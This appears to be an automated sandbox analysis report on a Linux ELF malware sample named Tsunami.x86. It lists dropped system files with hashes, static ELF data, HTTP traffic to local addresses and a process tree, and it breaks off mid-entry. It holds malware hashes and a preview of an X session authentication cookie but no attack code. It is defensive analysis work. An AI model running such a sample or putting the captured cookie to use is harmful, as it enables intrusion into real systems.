                            Preview: # This file is managed by man:systemd-resolved(8). Do not edit..#.# This is a dynamic resolv.conf file for connecting local clients to the.# internal DNS stub resolver of systemd-resolved. This file lists all.# configured search domains..#.# Run "resolvectl status" to see details about the uplink DNS servers.# currently in use..#.# Third party programs must not access this file directly, but only through the.# symlink at /etc/resolv.conf. To manage man:resolv.conf(5) in a different way,.# replace this symlink by a static file or a different symlink..#.# See man:systemd-resolved.service(8) for details about the supported modes of.# operation for /etc/resolv.conf...nameserver 127.0.0.53.options edns0 trust-ad.
                            /run/systemd/resolve/.#stub-resolv.conftKQjFi
                            Process:/lib/systemd/systemd-resolved
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):717
                            Entropy (8bit):4.618141658133841
                            Encrypted:false
                            Malicious:false
                            Preview: # This file is managed by man:systemd-resolved(8). Do not edit..#.# This is a dynamic resolv.conf file for connecting local clients to the.# internal DNS stub resolver of systemd-resolved. This file lists all.# configured search domains..#.# Run "resolvectl status" to see details about the uplink DNS servers.# currently in use..#.# Third party programs must not access this file directly, but only through the.# symlink at /etc/resolv.conf. To manage man:resolv.conf(5) in a different way,.# replace this symlink by a static file or a different symlink..#.# See man:systemd-resolved.service(8) for details about the supported modes of.# operation for /etc/resolv.conf...nameserver 127.0.0.53.options edns0 trust-ad.
                            /run/systemd/seats/.#seat02qDckX
                            Process:/lib/systemd/systemd-logind
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):116
                            Entropy (8bit):4.957035419463244
                            Encrypted:false
                            Malicious:false
                            Preview: # This is private data. Do not parse..IS_SEAT0=1.CAN_MULTI_SESSION=1.CAN_TTY=1.CAN_GRAPHICAL=0.SESSIONS=c1.UIDS=127.
                            /run/systemd/seats/.#seat046OY2g
                            Process:/lib/systemd/systemd-logind
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):95
                            Entropy (8bit):4.921230646592726
                            Encrypted:false
                            Malicious:false
                            Preview: # This is private data. Do not parse..IS_SEAT0=1.CAN_MULTI_SESSION=1.CAN_TTY=1.CAN_GRAPHICAL=0.
                            /run/systemd/seats/.#seat0AO62w8
                            Process:/lib/systemd/systemd-logind
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):95
                            Entropy (8bit):4.921230646592726
                            Encrypted:false
                            Malicious:false
                            Preview: # This is private data. Do not parse..IS_SEAT0=1.CAN_MULTI_SESSION=1.CAN_TTY=1.CAN_GRAPHICAL=0.
                            /run/systemd/seats/.#seat0KDc8xx
                            Process:/lib/systemd/systemd-logind
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):95
                            Entropy (8bit):4.921230646592726
                            Encrypted:false
                            Malicious:false
                            Preview: # This is private data. Do not parse..IS_SEAT0=1.CAN_MULTI_SESSION=1.CAN_TTY=1.CAN_GRAPHICAL=0.
                            /run/systemd/seats/.#seat0M0cr9y
                            Process:/lib/systemd/systemd-logind
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):95
                            Entropy (8bit):4.921230646592726
                            Encrypted:false
                            Malicious:false
                            Preview: # This is private data. Do not parse..IS_SEAT0=1.CAN_MULTI_SESSION=1.CAN_TTY=1.CAN_GRAPHICAL=0.
                            /run/systemd/seats/.#seat0M37b6X
                            Process:/lib/systemd/systemd-logind
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):95
                            Entropy (8bit):4.921230646592726
                            Encrypted:false
                            Malicious:false
                            Preview: # This is private data. Do not parse..IS_SEAT0=1.CAN_MULTI_SESSION=1.CAN_TTY=1.CAN_GRAPHICAL=0.
                            /run/systemd/seats/.#seat0QoBTOu
                            Process:/lib/systemd/systemd-logind
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):116
                            Entropy (8bit):4.957035419463244
                            Encrypted:false
                            Malicious:false
                            Preview: # This is private data. Do not parse..IS_SEAT0=1.CAN_MULTI_SESSION=1.CAN_TTY=1.CAN_GRAPHICAL=0.SESSIONS=c1.UIDS=127.
                            /run/systemd/seats/.#seat0coiqu6
                            Process:/lib/systemd/systemd-logind
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):116
                            Entropy (8bit):4.957035419463244
                            Encrypted:false
                            Malicious:false
                            Preview: # This is private data. Do not parse..IS_SEAT0=1.CAN_MULTI_SESSION=1.CAN_TTY=1.CAN_GRAPHICAL=0.SESSIONS=c1.UIDS=127.
                            /run/systemd/seats/.#seat0r3rbZf
                            Process:/lib/systemd/systemd-logind
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):116
                            Entropy (8bit):4.957035419463244
                            Encrypted:false
                            Malicious:false
                            Preview: # This is private data. Do not parse..IS_SEAT0=1.CAN_MULTI_SESSION=1.CAN_TTY=1.CAN_GRAPHICAL=0.SESSIONS=c1.UIDS=127.
                            /run/systemd/users/.#12747MNR8
                            Process:/lib/systemd/systemd-logind
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):174
                            Entropy (8bit):5.329800055234959
                            Encrypted:false
                            Malicious:false
                            Preview: # This is private data. Do not parse..NAME=gdm.STATE=closing.STOPPING=no.RUNTIME=/run/user/127.REALTIME=1635740275216589.MONOTONIC=536737466.LAST_SESSION_TIMESTAMP=536866904.
                            /run/systemd/users/.#1276XT3Nw
                            Process:/lib/systemd/systemd-logind
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):174
                            Entropy (8bit):5.342963814174346
                            Encrypted:false
                            Malicious:false
                            Preview: # This is private data. Do not parse..NAME=gdm.STATE=closing.STOPPING=no.RUNTIME=/run/user/127.REALTIME=1635740192211758.MONOTONIC=453732634.LAST_SESSION_TIMESTAMP=453799028.
                            /run/systemd/users/.#12783frXX
                            Process:/lib/systemd/systemd-logind
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):282
                            Entropy (8bit):5.31469715356827
                            Encrypted:false
                            Malicious:false
                            Preview: # This is private data. Do not parse..NAME=gdm.STATE=opening.STOPPING=no.RUNTIME=/run/user/127.SERVICE_JOB=/org/freedesktop/systemd1/job/12303.REALTIME=1635740308474474.MONOTONIC=569995351.SESSIONS=c1.SEATS=seat0.ACTIVE_SESSIONS=.ONLINE_SESSIONS=c1.ACTIVE_SEATS=.ONLINE_SEATS=seat0.
                            /run/systemd/users/.#1279FTDn7
                            Process:/lib/systemd/systemd-logind
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):188
                            Entropy (8bit):4.928997328913428
                            Encrypted:false
                            Malicious:false
                            Preview: # This is private data. Do not parse..NAME=gdm.STATE=opening.STOPPING=no.RUNTIME=/run/user/127.SESSIONS=c1.SEATS=seat0.ACTIVE_SESSIONS=.ONLINE_SESSIONS=c1.ACTIVE_SEATS=.ONLINE_SEATS=seat0.
                            /run/systemd/users/.#127ESlsZh
                            Process:/lib/systemd/systemd-logind
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):282
                            Entropy (8bit):5.305076431858351
                            Encrypted:false
                            Malicious:false
                            Preview: # This is private data. Do not parse..NAME=gdm.STATE=opening.STOPPING=no.RUNTIME=/run/user/127.SERVICE_JOB=/org/freedesktop/systemd1/job/12613.REALTIME=1635740329321105.MONOTONIC=590841982.SESSIONS=c1.SEATS=seat0.ACTIVE_SESSIONS=.ONLINE_SESSIONS=c1.ACTIVE_SEATS=.ONLINE_SEATS=seat0.
                            /run/systemd/users/.#127EeiJ4X
                            Process:/lib/systemd/systemd-logind
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):188
                            Entropy (8bit):4.928997328913428
                            Encrypted:false
                            Malicious:false
                            Preview: # This is private data. Do not parse..NAME=gdm.STATE=opening.STOPPING=no.RUNTIME=/run/user/127.SESSIONS=c1.SEATS=seat0.ACTIVE_SESSIONS=.ONLINE_SESSIONS=c1.ACTIVE_SEATS=.ONLINE_SEATS=seat0.
                            /run/systemd/users/.#127FXZ6Iw
                            Process:/lib/systemd/systemd-logind
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):188
                            Entropy (8bit):4.928997328913428
                            Encrypted:false
                            Malicious:false
                            Preview: # This is private data. Do not parse..NAME=gdm.STATE=opening.STOPPING=no.RUNTIME=/run/user/127.SESSIONS=c1.SEATS=seat0.ACTIVE_SESSIONS=.ONLINE_SESSIONS=c1.ACTIVE_SEATS=.ONLINE_SEATS=seat0.
                            /run/systemd/users/.#127FjEyjh
                            Process:/lib/systemd/systemd-logind
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):188
                            Entropy (8bit):4.928997328913428
                            Encrypted:false
                            Malicious:false
                            Preview: # This is private data. Do not parse..NAME=gdm.STATE=opening.STOPPING=no.RUNTIME=/run/user/127.SESSIONS=c1.SEATS=seat0.ACTIVE_SESSIONS=.ONLINE_SESSIONS=c1.ACTIVE_SEATS=.ONLINE_SEATS=seat0.
                            /run/systemd/users/.#127KG8sav
                            Process:/lib/systemd/systemd-logind
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):223
                            Entropy (8bit):5.494167055347199
                            Encrypted:false
                            Malicious:false
                            Preview: # This is private data. Do not parse..NAME=gdm.STATE=closing.STOPPING=yes.RUNTIME=/run/user/127.SERVICE_JOB=/org/freedesktop/systemd1/job/11863.REALTIME=1635740192211758.MONOTONIC=453732634.LAST_SESSION_TIMESTAMP=453799028.
                            /run/systemd/users/.#127M9yga9
                            Process:/lib/systemd/systemd-logind
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):223
                            Entropy (8bit):5.485749804479101
                            Encrypted:false
                            Malicious:false
                            Preview: # This is private data. Do not parse..NAME=gdm.STATE=closing.STOPPING=yes.RUNTIME=/run/user/127.SERVICE_JOB=/org/freedesktop/systemd1/job/12114.REALTIME=1635740275216589.MONOTONIC=536737466.LAST_SESSION_TIMESTAMP=536866904.
                            /run/systemd/users/.#127PTqSKf
                            Process:/lib/systemd/systemd-logind
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):282
                            Entropy (8bit):5.305076431858351
                            Encrypted:false
                            Malicious:false
                            Preview: # This is private data. Do not parse..NAME=gdm.STATE=opening.STOPPING=no.RUNTIME=/run/user/127.SERVICE_JOB=/org/freedesktop/systemd1/job/12613.REALTIME=1635740329321105.MONOTONIC=590841982.SESSIONS=c1.SEATS=seat0.ACTIVE_SESSIONS=.ONLINE_SESSIONS=c1.ACTIVE_SEATS=.ONLINE_SEATS=seat0.
                            /run/systemd/users/.#127SWvIvy
                            Process:/lib/systemd/systemd-logind
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):282
                            Entropy (8bit):5.2993488222581275
                            Encrypted:false
                            Malicious:false
                            Preview: # This is private data. Do not parse..NAME=gdm.STATE=opening.STOPPING=no.RUNTIME=/run/user/127.SERVICE_JOB=/org/freedesktop/systemd1/job/11801.REALTIME=1635740192211758.MONOTONIC=453732634.SESSIONS=c1.SEATS=seat0.ACTIVE_SESSIONS=.ONLINE_SESSIONS=c1.ACTIVE_SEATS=.ONLINE_SEATS=seat0.
                            /run/systemd/users/.#127VSl0A8
                            Process:/lib/systemd/systemd-logind
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):223
                            Entropy (8bit):5.485749804479101
                            Encrypted:false
                            Malicious:false
                            Preview: # This is private data. Do not parse..NAME=gdm.STATE=closing.STOPPING=yes.RUNTIME=/run/user/127.SERVICE_JOB=/org/freedesktop/systemd1/job/12114.REALTIME=1635740275216589.MONOTONIC=536737466.LAST_SESSION_TIMESTAMP=536866904.
                            /run/systemd/users/.#127W4w1sw
                            Process:/lib/systemd/systemd-logind
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):282
                            Entropy (8bit):5.2993488222581275
                            Encrypted:false
                            Malicious:false
                            Preview: # This is private data. Do not parse..NAME=gdm.STATE=opening.STOPPING=no.RUNTIME=/run/user/127.SERVICE_JOB=/org/freedesktop/systemd1/job/11801.REALTIME=1635740192211758.MONOTONIC=453732634.SESSIONS=c1.SEATS=seat0.ACTIVE_SESSIONS=.ONLINE_SESSIONS=c1.ACTIVE_SEATS=.ONLINE_SEATS=seat0.
                            /run/systemd/users/.#127Xyem45
                            Process:/lib/systemd/systemd-logind
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):282
                            Entropy (8bit):5.3089892086234585
                            Encrypted:false
                            Malicious:false
                            Preview: # This is private data. Do not parse..NAME=gdm.STATE=opening.STOPPING=no.RUNTIME=/run/user/127.SERVICE_JOB=/org/freedesktop/systemd1/job/12052.REALTIME=1635740275216589.MONOTONIC=536737466.SESSIONS=c1.SEATS=seat0.ACTIVE_SESSIONS=.ONLINE_SESSIONS=c1.ACTIVE_SEATS=.ONLINE_SEATS=seat0.
                            /run/systemd/users/.#127l2Tfz5
                            Process:/lib/systemd/systemd-logind
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):282
                            Entropy (8bit):5.3089892086234585
                            Encrypted:false
                            Malicious:false
                            Preview: # This is private data. Do not parse..NAME=gdm.STATE=opening.STOPPING=no.RUNTIME=/run/user/127.SERVICE_JOB=/org/freedesktop/systemd1/job/12052.REALTIME=1635740275216589.MONOTONIC=536737466.SESSIONS=c1.SEATS=seat0.ACTIVE_SESSIONS=.ONLINE_SESSIONS=c1.ACTIVE_SEATS=.ONLINE_SEATS=seat0.
                            /run/systemd/users/.#127osNmKY
                            Process:/lib/systemd/systemd-logind
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):282
                            Entropy (8bit):5.31469715356827
                            Encrypted:false
                            Malicious:false
                            Preview: # This is private data. Do not parse..NAME=gdm.STATE=opening.STOPPING=no.RUNTIME=/run/user/127.SERVICE_JOB=/org/freedesktop/systemd1/job/12303.REALTIME=1635740308474474.MONOTONIC=569995351.SESSIONS=c1.SEATS=seat0.ACTIVE_SESSIONS=.ONLINE_SESSIONS=c1.ACTIVE_SEATS=.ONLINE_SEATS=seat0.
                            /run/user/1000/pulse/pid
                            Process:/usr/bin/pulseaudio
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):5
                            Entropy (8bit):2.321928094887362
                            Encrypted:false
                            Malicious:false
                            Preview: 5713.
                            /sys/fs/cgroup/systemd/user.slice/user-127.slice/user@127.service/dbus.socket/cgroup.procs
                            Process:/lib/systemd/systemd
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):5
                            Entropy (8bit):1.9219280948873623
                            Encrypted:false
                            Malicious:false
                            Preview: 6265.
                            /sys/fs/cgroup/systemd/user.slice/user-127.slice/user@127.service/init.scope/cgroup.procs
                            Process:/lib/systemd/systemd
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):10
                            Entropy (8bit):2.5219280948873624
                            Encrypted:false
                            Malicious:false
                            Preview: 7135.7136.
                            /sys/fs/cgroup/systemd/user.slice/user-127.slice/user@127.service/pulseaudio.service/cgroup.procs
                            Process:/lib/systemd/systemd
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):5
                            Entropy (8bit):1.9219280948873623
                            Encrypted:false
                            Malicious:false
                            Preview: 6268.
                            /sys/fs/cgroup/unified/user.slice/user-127.slice/user@127.service/dbus.socket/cgroup.procs
                            Process:/lib/systemd/systemd
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):5
                            Entropy (8bit):1.9219280948873623
                            Encrypted:false
                            Malicious:false
                            Preview: 6265.
                            /sys/fs/cgroup/unified/user.slice/user-127.slice/user@127.service/init.scope/cgroup.procs
                            Process:/lib/systemd/systemd
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):10
                            Entropy (8bit):2.5219280948873624
                            Encrypted:false
                            Malicious:false
                            Preview: 7135.7136.
                            /sys/fs/cgroup/unified/user.slice/user-127.slice/user@127.service/pulseaudio.service/cgroup.procs
                            Process:/lib/systemd/systemd
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):5
                            Entropy (8bit):1.9219280948873623
                            Encrypted:false
                            Malicious:false
                            Preview: 6268.
                            /tmp/server-0.xkm
                            Process:/usr/bin/xkbcomp
                            File Type:Compiled XKB Keymap: lsb, version 15
                            Category:dropped
                            Size (bytes):12040
                            Entropy (8bit):4.844996337994878
                            Encrypted:false
                            Malicious:false
                            /var/lib/AccountsService/users/gdm.1HJVB1
                            Process:/usr/lib/accountsservice/accounts-daemon
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):61
                            Entropy (8bit):4.66214589518167
                            Encrypted:false
                            Malicious:false
                            Preview: [User].XSession=.Icon=/var/lib/gdm3/.face.SystemAccount=true.
                            /var/lib/AccountsService/users/gdm.2I6LB1
                            Process:/usr/lib/accountsservice/accounts-daemon
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):61
                            Entropy (8bit):4.66214589518167
                            Encrypted:false
                            Malicious:false
                            Preview: [User].XSession=.Icon=/var/lib/gdm3/.face.SystemAccount=true.
                            /var/lib/AccountsService/users/gdm.75G5B1
                            Process:/usr/lib/accountsservice/accounts-daemon
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):61
                            Entropy (8bit):4.66214589518167
                            Encrypted:false
                            Malicious:false
                            Preview: [User].XSession=.Icon=/var/lib/gdm3/.face.SystemAccount=true.
                            /var/lib/AccountsService/users/gdm.XCO5B1
                            Process:/usr/lib/accountsservice/accounts-daemon
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):61
                            Entropy (8bit):4.66214589518167
                            Encrypted:false
                            SSDEEP:3:urzMQvNT+PzKLrAan4R8AKn:gzMQIzKLrAa4M
                            MD5:542BA3FB41206AE43928AF1C5E61FEBC
                            SHA1:F56F574DAF50D609526B36B5B54FDD59EA4D6A26
                            SHA-256:730D9509D4EAA7266829A8F5A8CFEBA6BBDDD5873FC2BD580AD464F4A237E11A
                            SHA-512:D774B8F191A5C65228D1B3CA1181701CFCD07A3D91C5571B0DDF32AD3E241C2D7BDFC0697AB97DC10441EF9CDC8AEE5B19BC34E13E5C8B0B91AD06EEF42F5AEA
                            Malicious:false
                            Preview: [User].XSession=.Icon=/var/lib/gdm3/.face.SystemAccount=true.
                            /var/lib/gdm3/.cache/gdm/Xauthority
                            Process:/usr/lib/gdm3/gdm-x-session
                            File Type:X11 Xauthority data
                            Category:dropped
                            Size (bytes):104
                            Entropy (8bit):4.9303161813880365
                            Encrypted:false
                            SSDEEP:3:rg/WFllasO93D4bxuwENWFllasO93D4b6:rg/WFl2zixuxNWFl2zi6
                            MD5:950C73B9A04A2FA71DD2C8F60CE7DB60
                            SHA1:B762FEDEB3279C772C2C2F3A3B7830A215290EB2
                            SHA-256:4045BF76BE9EA53E9BD7864922830A8C13534730C3793719838040104E8A5A9D
                            SHA-512:F54A3599AC1FCA9CC29224B494372E1B7436D262FD18D93B5D61C25640DCD647D2EF4244AF877BA25A49F178EB931AD6991308DAED30CDF0B26B3918EBCE3096
                            Malicious:false
                            Preview: ....galassia....MIT-MAGIC-COOKIE-1...C.....H$..l.Z......galassia....MIT-MAGIC-COOKIE-1...C.....H$..l.Z..
                            /var/log/Xorg.0.log
                            Process:/usr/lib/xorg/Xorg
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):41599
                            Entropy (8bit):5.291268614981562
                            Encrypted:false
                            SSDEEP:384:TYO9YlIcUCeNYMgdSdpdEdXdRd0dbdmdQdPdKdLdgdvd+d1dFdMdud7dzDdG4duG:UOK+79BZ4QZxzDSZyZPo/1P
                            MD5:BDDBC9BCA381D50353BFA57F68273E16
                            SHA1:7E40DFA82EAEF5AADD33B990EA83D7F81730D82F
                            SHA-256:B04B60742F0BE6F2CEB5FE33A05EF58C6DC442EFD4E255D4662B1888A96B363F
                            SHA-512:D0C0A0474CF689FC4CA333FD82212455F4007F30803BFDE1FA2DFB76D19A53F5DBFB6BD658EFAFEE3BA6FACAFA9C4EF8F5578FB0791175DF7FA9367BDDC0C9E4
                            Malicious:false
                            Preview: [ 571.102] (--) Log file renamed from "/var/log/Xorg.pid-6719.log" to "/var/log/Xorg.0.log".[ 571.140] .X.Org X Server 1.20.11.X Protocol Version 11, Revision 0.[ 571.171] Build Operating System: linux Ubuntu.[ 571.239] Current Operating System: Linux galassia 5.4.0-72-generic #80-Ubuntu SMP Mon Apr 12 17:35:00 UTC 2021 x86_64.[ 571.378] Kernel command line: Patched by Joe: BOOT_IMAGE=/vmlinuz-5.4.0-72-generic root=/dev/mapper/ubuntu--vg-ubuntu--lv ro maybe-ubiquity.[ 571.724] Build Date: 06 July 2021 10:17:51AM.[ 571.773] xorg-server 2:1.20.11-1ubuntu1~20.04.2 (For technical support please see http://www.ubuntu.com/support) .[ 571.946] Current version of pixman: 0.38.4.[ 572.125] .Before reporting problems, check http://wiki.x.org..to make sure that you have the latest version..[ 572.178] Markers: (--) probed, (**) from config file, (==) default setting,..(++) from command line, (!!) notice, (II) informational,..(WW) warning, (EE) error, (NI) not implemented, (??)

                            Static File Info

                            General

                            File type:ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped
                            Entropy (8bit):7.882890311864268
                            TrID:
                            • ELF Executable and Linkable format (Linux) (4029/14) 50.16%
                            • ELF Executable and Linkable format (generic) (4004/1) 49.84%
                            File name:Tsunami.x86
                            File size:28992
                            MD5:eeff9245e700bd5a5ad66e2b7da182e0
                            SHA1:4fc227c03eadaabb350fa2fffdf84ec47d707fb9
                            SHA256:35c466355eb2680e17f3727da23d045ae0a6a1abca1032a33138cdeea20478bf
                            SHA512:6e566f95d7c61ceee94fbc8fa0254366daaba107a5e2add1197fd9a7b13701320e915de274a5cea4f3466597b6faaddce765bd287de4c4c9201d246604d858a7
                            SSDEEP:768:WnBHJrCUUFFRs6tAlyuwRHT9OL/IZK5KDdzlFb2z1LfKzIV:OHJ9UFFdtQyHYLQuKxH2zd7
                            File Content Preview:.ELF....................@x..4...........4. ...(.....................Lp..Lp.............. ... ... ...................Q.td................................UPX!....................[.......w....ELF.......d....e..4...7. 2(.....[]w...F.."..'......?....... .\...p

                            Static ELF Info

                            ELF header

                            Class:ELF32
                            Data:2's complement, little endian
                            Version:1 (current)
                            Machine:Intel 80386
                            Version Number:0x1
                            Type:EXEC (Executable file)
                            OS/ABI:UNIX - Linux
                            ABI Version:0
                            Entry Point Address:0xc07840
                            Flags:0x0
                            ELF Header Size:52
                            Program Header Offset:52
                            Program Header Size:32
                            Number of Program Headers:3
                            Section Header Offset:0
                            Section Header Size:40
                            Number of Section Headers:0
                            Header String Table Index:0

                            Program Segments

                            Type       Offset  Virtual Address  Physical Address  File Size  Memory Size  Entropy  Flags  Flags Description  Align   Prog Interpreter  Section Mappings
                            LOAD       0x0     0xc01000         0xc01000          0x704c     0x704c       4.3772   0x5    R E                0x1000
                            LOAD       0xb20   0x8059b20        0x8059b20         0x0        0x0          0.0000   0x6    RW                 0x1000
                            GNU_STACK  0x0     0x0              0x0               0x0        0x0          0.0000   0x6    RW                 0x4

                            Network Behavior

                            Network Port Distribution

                            TCP Packets


                            HTTP Request Dependency Graph

                            • 127.0.0.1:80
                            • 192.168.0.14:80

                            System Behavior

                            General

                            Start time:04:15:49
                            Start date:01/11/2021
                            Path:/tmp/Tsunami.x86
                            Arguments:/tmp/Tsunami.x86
                            File size:28992 bytes
                            MD5 hash:eeff9245e700bd5a5ad66e2b7da182e0

                            General

                            Start time:04:15:49
                            Start date:01/11/2021
                            Path:/tmp/Tsunami.x86
                            Arguments:n/a
                            File size:28992 bytes
                            MD5 hash:eeff9245e700bd5a5ad66e2b7da182e0

                            General

                            Start time:04:15:52
                            Start date:01/11/2021
                            Path:/usr/lib/systemd/systemd
                            Arguments:n/a
                            File size:1620224 bytes
                            MD5 hash:9b2bec7092a40488108543f9334aab75

                            General

                            Start time:04:15:52
                            Start date:01/11/2021
                            Path:/usr/sbin/sshd
                            Arguments:/usr/sbin/sshd -t
                            File size:876328 bytes
                            MD5 hash:dbca7a6bbf7bf57fedac243d4b2cb340

                            General

                            Start time:04:15:53
                            Start date:01/11/2021
                            Path:/usr/lib/systemd/systemd
                            Arguments:n/a
                            File size:1620224 bytes
                            MD5 hash:9b2bec7092a40488108543f9334aab75

                            General

                            Start time:04:15:53
                            Start date:01/11/2021
                            Path:/usr/sbin/sshd
                            Arguments:/usr/sbin/sshd -D
                            File size:876328 bytes
                            MD5 hash:dbca7a6bbf7bf57fedac243d4b2cb340

                            General

                            Start time:04:16:16
                            Start date:01/11/2021
                            Path:/usr/lib/systemd/systemd
                            Arguments:n/a
                            File size:1620224 bytes
                            MD5 hash:9b2bec7092a40488108543f9334aab75

                            General

                            Start time:04:16:16
                            Start date:01/11/2021
                            Path:/lib/systemd/systemd-resolved
                            Arguments:/lib/systemd/systemd-resolved
                            File size:415968 bytes
                            MD5 hash:c93bbc5e20248114c56896451eab7a8b

                            General

                            Start time:04:16:25
                            Start date:01/11/2021
                            Path:/usr/lib/systemd/systemd
                            Arguments:n/a
                            File size:1620224 bytes
                            MD5 hash:9b2bec7092a40488108543f9334aab75

                            General

                            Start time:04:16:25
                            Start date:01/11/2021
                            Path:/lib/systemd/systemd-logind
                            Arguments:/lib/systemd/systemd-logind
                            File size:268576 bytes
                            MD5 hash:8dd58a1b4c12f7a1d5fe3ce18b2aaeef

                            General

                            Start time:04:16:26
                            Start date:01/11/2021
                            Path:/usr/lib/systemd/systemd
                            Arguments:n/a
                            File size:1620224 bytes
                            MD5 hash:9b2bec7092a40488108543f9334aab75

                            General

                            Start time:04:16:26
                            Start date:01/11/2021
                            Path:/usr/lib/accountsservice/accounts-daemon
                            Arguments:/usr/lib/accountsservice/accounts-daemon
                            File size:203192 bytes
                            MD5 hash:01a899e3fb5e7e434bea1290255a1f30

                            General

                            Start time:04:16:27
                            Start date:01/11/2021
                            Path:/usr/lib/accountsservice/accounts-daemon
                            Arguments:n/a
                            File size:203192 bytes
                            MD5 hash:01a899e3fb5e7e434bea1290255a1f30

                            General

                            Start time:04:16:27
                            Start date:01/11/2021
                            Path:/usr/share/language-tools/language-validate
                            Arguments:/usr/share/language-tools/language-validate en_US.UTF-8
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            General

                            Start time:04:16:27
                            Start date:01/11/2021
                            Path:/usr/share/language-tools/language-validate
                            Arguments:n/a
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            General

                            Start time:04:16:27
                            Start date:01/11/2021
                            Path:/usr/share/language-tools/language-options
                            Arguments:/usr/share/language-tools/language-options
                            File size:3478464 bytes
                            MD5 hash:16a21f464119ea7fad1d3660de963637

                            General

                            Start time:04:16:28
                            Start date:01/11/2021
                            Path:/usr/share/language-tools/language-options
                            Arguments:n/a
                            File size:3478464 bytes
                            MD5 hash:16a21f464119ea7fad1d3660de963637

                            General

                            Start time:04:16:28
                            Start date:01/11/2021
                            Path:/bin/sh
                            Arguments:sh -c "locale -a | grep -F .utf8 "
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            General

                            Start time:04:16:28
                            Start date:01/11/2021
                            Path:/bin/sh
                            Arguments:n/a
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            General

                            Start time:04:16:28
                            Start date:01/11/2021
                            Path:/usr/bin/locale
                            Arguments:locale -a
                            File size:58944 bytes
                            MD5 hash:c72a78792469db86d91369c9057f20d2

                            General

                            Start time:04:16:28
                            Start date:01/11/2021
                            Path:/bin/sh
                            Arguments:n/a
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            General

                            Start time:04:16:28
                            Start date:01/11/2021
                            Path:/usr/bin/grep
                            Arguments:grep -F .utf8
                            File size:199136 bytes
                            MD5 hash:1e6ebb9dd094f774478f72727bdba0f5

                            General

                            Start time:04:16:26
                            Start date:01/11/2021
                            Path:/usr/bin/xfce4-session
                            Arguments:n/a
                            File size:264752 bytes
                            MD5 hash:648919f03ad356720c8c27f5aaaf75d1

                            General

                            Start time:04:16:26
                            Start date:01/11/2021
                            Path:/usr/bin/rm
                            Arguments:rm -f /home/saturnino/.cache/sessions/Thunar-2ec9153f1-6fa0-4067-96b1-e5fe875b1e51
                            File size:72056 bytes
                            MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                            General

                            Start time:04:16:26
                            Start date:01/11/2021
                            Path:/usr/lib/systemd/systemd
                            Arguments:n/a
                            File size:1620224 bytes
                            MD5 hash:9b2bec7092a40488108543f9334aab75

                            General

                            Start time:04:16:26
                            Start date:01/11/2021
                            Path:/usr/bin/pulseaudio
                            Arguments:/usr/bin/pulseaudio --daemonize=no --log-target=journal
                            File size:100832 bytes
                            MD5 hash:0c3b4c789d8ffb12b25507f27e14c186

                            General

                            Start time:04:16:27
                            Start date:01/11/2021
                            Path:/usr/lib/gdm3/gdm-session-worker
                            Arguments:n/a
                            File size:293360 bytes
                            MD5 hash:692243754bd9f38fe9bd7e230b5c060a

                            General

                            Start time:04:16:27
                            Start date:01/11/2021
                            Path:/etc/gdm3/PostSession/Default
                            Arguments:/etc/gdm3/PostSession/Default
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            General

                            Start time:04:16:30
                            Start date:01/11/2021
                            Path:/usr/sbin/gdm3
                            Arguments:n/a
                            File size:453296 bytes
                            MD5 hash:2492e2d8d34f9377e3e530a61a15674f

                            General

                            Start time:04:16:30
                            Start date:01/11/2021
                            Path:/usr/lib/gdm3/gdm-session-worker
                            Arguments:"gdm-session-worker [pam/gdm-launch-environment]"
                            File size:293360 bytes
                            MD5 hash:692243754bd9f38fe9bd7e230b5c060a

                            General

                            Start time:04:16:32
                            Start date:01/11/2021
                            Path:/usr/lib/gdm3/gdm-session-worker
                            Arguments:n/a
                            File size:293360 bytes
                            MD5 hash:692243754bd9f38fe9bd7e230b5c060a

                            General

                            Start time:04:16:32
                            Start date:01/11/2021
                            Path:/usr/lib/gdm3/gdm-x-session
